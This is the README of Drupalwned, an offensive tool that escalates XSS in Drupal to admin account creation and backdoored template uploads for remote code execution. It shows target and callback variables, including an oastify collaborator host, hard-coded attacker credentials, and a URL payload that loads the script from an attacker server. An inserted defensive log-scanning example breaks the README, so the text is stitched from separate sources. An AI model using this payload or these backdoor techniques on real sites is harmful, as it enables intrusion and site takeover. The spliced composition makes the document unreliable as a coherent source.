Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other critical vulnerabilities in Drupal CMS.

nowak0x01/Drupalwned


Drupalwned

Drupal exploitation script that elevates XSS to RCE or other critical vulnerabilities.

About - Key Features - How To Use - Examples - Contributing

About

Drupalwned is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other critical vulnerabilities in Drupal CMS.

💧 This script provides support for Drupal Versions 7.X.X, 8.X.X, 9.X.X and 10.X.X. 💧

Key Features

  • Privilege Escalation
    • Creates an administrative user in Drupal.
  • (RCE) Upload Template
    • Uploads custom backdoored templates to Drupal.
  • // Pending
    • more ways to get RCE

How To Use

1) Clone the Repository

git clone https://github.com/nowak0x01/Drupalwned

2) Edit the script by selecting the desired function and modifying its variable values. (Example: DPCreateAccount)

// ************************************ ~% Variables %~ ************************************ //

var Target = "https://172.17.0.1:8000/"; // Ex: https://192.168.84.212:8000/drupal/
var Callback = "http://zfi0g0xtiqb6qjh564xr92xnxe35rvfk.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

// DPCreateAccount(); // (Privilege Escalation) - Creates an Administrative user in Drupal.
// DPUploadTemplate(); // (RCE) - Upload a Template module (backdoor) to Drupal.

function DPCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Email = "nowak@example.com";  // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered). - <Mandatory>
    var Username = "nowak";         // (It is recommended to use a valid employee name from the target company). - <Mandatory>
    var Password = `j^QEkyvd7*g3`;  /* - <Mandatory> 
                            Make it at least 12 characters
                            Add lowercase letters
                            Add uppercase letters
                            Add numbers
                            Add punctuation
                                    */
    /* ************************************************************************************************************************************************ */

3) Start a web server

python3 -m http.server 80

4) Go to the Drupal XSS vector and include drupalwned.js

https://drupal.example.com/plugin.php?s=<script%20src="//VPS/drupalwned.js"></script>
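Seen from the defending side, step 4 leaves a request in the web server's access log whose query string carries a `<script src=...>` tag pointing at a host other than the site itself. The following is an added example, not part of Drupalwned or its repository: a small Node.js log check for that pattern. The `SITE_HOST` value, the function names and the sample log lines are assumptions constructed for illustration.

```javascript
// Added example (not Drupalwned code): flag logged requests whose query string injects an external <script src>.
const SITE_HOST = "drupal.example.com"; // assumption: the site's own hostname

// Percent-decode repeatedly (bounded) so double-encoded payloads are still seen.
function deepDecode(s, rounds = 3) {
  for (let i = 0; i < rounds; i++) {
    let next;
    try { next = decodeURIComponent(s.replace(/\+/g, " ")); } catch { return s; }
    if (next === s) break;
    s = next;
  }
  return s;
}

// Return the external hosts referenced by <script src> tags in a request target.
function externalScriptHosts(requestTarget, siteHost = SITE_HOST) {
  const q = requestTarget.indexOf("?");
  if (q < 0) return [];
  const decoded = deepDecode(requestTarget.slice(q + 1));
  const tagRe = /<script\b[^>]*\bsrc\s*=\s*["']?\s*(?:https?:)?\/\/([^\/"'\s>]+)/gi;
  const hosts = [];
  for (const m of decoded.matchAll(tagRe)) {
    const host = m[1].toLowerCase();
    if (host !== siteHost) hosts.push(host);
  }
  return hosts;
}

// Parse combined-log-format lines and return the suspicious requests.
function scanAccessLog(lines, siteHost = SITE_HOST) {
  const reqRe = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"/;
  const findings = [];
  for (const line of lines) {
    const m = reqRe.exec(line);
    if (!m) continue;
    const hosts = externalScriptHosts(m[2], siteHost);
    if (hosts.length) findings.push({ client: m[1], target: m[2], hosts });
  }
  return findings;
}

// Constructed sample log lines (documentation addresses, not real traffic).
const SAMPLE_LOG = [
  '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /node/1?page=2 HTTP/1.1" 200 5120',
  '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /plugin.php?s=%3Cscript%20src=%22//vps.example.net/x.js%22%3E%3C/script%3E HTTP/1.1" 200 830',
  '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /plugin.php?s=%253Cscript%2520src%253D//vps.example.net/x.js%253E HTTP/1.1" 200 830',
  '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /search?q=%3Cscript%20src=%22//drupal.example.com/core.js%22%3E HTTP/1.1" 200 900',
];
console.log(scanAccessLog(SAMPLE_LOG));
```

A hit only shows that the request was made; whether the page reflected the tag unescaped still has to be confirmed against the application, and a new administrative account created shortly afterwards is the follow-on event to look for.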

Examples

🌧️ DPCreateAccount() - Creates a user in Drupal.

DPUploadTemplate() - Uploads a custom backdoored template to Drupal.

Contributing

If you're interested in contributing or enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.

               r
               ain
               rai
              nrain
             rainrai
            nrainrain
           ainrainrain
          rainrainrainr
         ainrainrainrain
        rainrainrainrainr
      ainrainrainrainrainra         Drupalwned (https://github.com/nowak0x01/Drupalwned)
    inra nrainrainrainrainrai                      @Author: Hudson Nowak
  nrain  inrainrainrainrainrain
 rain   nrainrainrainrainrainrai
nrai   inrainrainrainrainrainrain
rai   inrainrainrainrainrainrainr
rain   nrainrainrainrainrainrainr
 rainr  nrainrainrainrainrainrai
  nrain ainrainrainrainrainrain
    rainrainrainrainrainrainr
      rainranirainrainrainr
           ainrainrain
